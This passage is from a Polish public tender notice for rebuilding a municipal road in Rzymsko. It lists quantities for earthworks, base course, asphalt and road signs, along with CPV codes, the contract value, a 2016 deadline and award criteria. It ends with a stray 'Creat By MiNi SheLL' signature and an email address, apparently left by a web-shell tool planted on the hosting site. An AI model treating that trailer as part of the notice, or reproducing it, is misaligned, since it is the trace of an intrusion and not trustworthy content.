23	Tablice znaków drogowych zakazu, nakazu,ostrzegawczych i informacyjnych o powierzchni ponad 0,3 m2	szt	3,000

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45121006-6,
                    45233220-7,
                    45100000-8,
                    45233140-2,
                    45100000-8,
                    45233314-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  128132.66<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/10/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>PRZEBUDOWA DROGI GMINNEJ WEWNĘTRZNEJ W MIEJSCOWOŚCI RZYMSKO, NA ODCINKU KM 0,700 DO KM 1+000 NA ODCINKU 300 MB<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>I. ROBOTY POMIAROWE, PRZYGOTOWAWCZE I ROZBIÓRKOWE 

1	Roboty pomiarowe przy liniowych robotach ziemnych (drogach), w terenie: równinnym - geodezyjne wytyczenie drogi oraz pasa drogowego z zastabilizowaniem punktów		0,370 km

2	Inwentaryzacja powykonawcza (całego przebudowwywanego odcinka )	.	1,000 szt

3	Mechaniczne karczowanie krzaków i podszycia: gęstych		0,080 ha

4	Transport gałęzi wraz z utylizają		37,000 mp

5	Usunięcie warstwy ziemi urodzajnej (humusu),  wraz z załadunkiem i  odwozem humusu na odległość 5 km na  przy grubości warstwy: do 15 cm - ścinka poboczy i skarp korony drogi		655,000 m2

II. ROBOTY ZIEMNE 

6	Wykopy pod rury osłonowe typu AROT wykonane ręcznie	m3	71,040

7	Ułożenie rur osłonowych typu AROT o średnicy 110mm		148,000 mb

8	Zasypanie wykopów pod rury osłonowe typu ARPT wraz z ręcznym zagęszczeniem		71,040 m3

9	Formowanie nasypów   z materiału dowiezionego Po, Pr, ps wraz z zakupem i dowozem materiału , z zagęszczeniem warstwami o grub. 20 cm - uzupełnienie korony drogi		34,000 m3

III. PODBUDOWA 

10	Profilowanie i zagęszczanie istniejącej podbudowy pod warstwy konstrukcyjne nawierzchni - zagęszczanie walcem wibracyjnym		1221,000 m2

11	Wyrównanie istniejącej podbudowy kruszywem łamanym 0-31,5mm, zagęszczanym mechanicznie, przy grubości warstwy po zagęszczeniu do 10 cm - średnia grubość 10 cm		122,100 m3

IV. NAWIERZCHNIA 

12	Warstwa ścieralna nawierzchni, wykonana z betonu asfaltowego KR1 wg PN-EN-13108-1 AC11S, przy grubości warstwy po zagęszczeniu 4 cm		1110,000 m2

V. ROBOTY WYKOŃCZENIOWE 

13	Uzupełnienie poboczy  kruszywem łamanym stabilizowanym mechanicznie ( 0-31,5mm) , wraz z zakupem i dowozem materiału  zagęszczone przy użyciu walca wibracyjnego, grubość w-wy 10 cm 2x0,75m		555,000 m2

14	Słupki pionowych znaków drogowych z rur stalowych o średnicy 60 mm		1,000 szt

15	Tablice znaków drogowych zakazu, nakazu,  ostrzegawczych i informacyjnych

       o powierzchni ponad   0,3 m2	2,000 szt

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45121006-6,
                    45233220-7,
                    45233140-2,
                    45100000-8,
                    45233314-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  128132.66<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/10/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com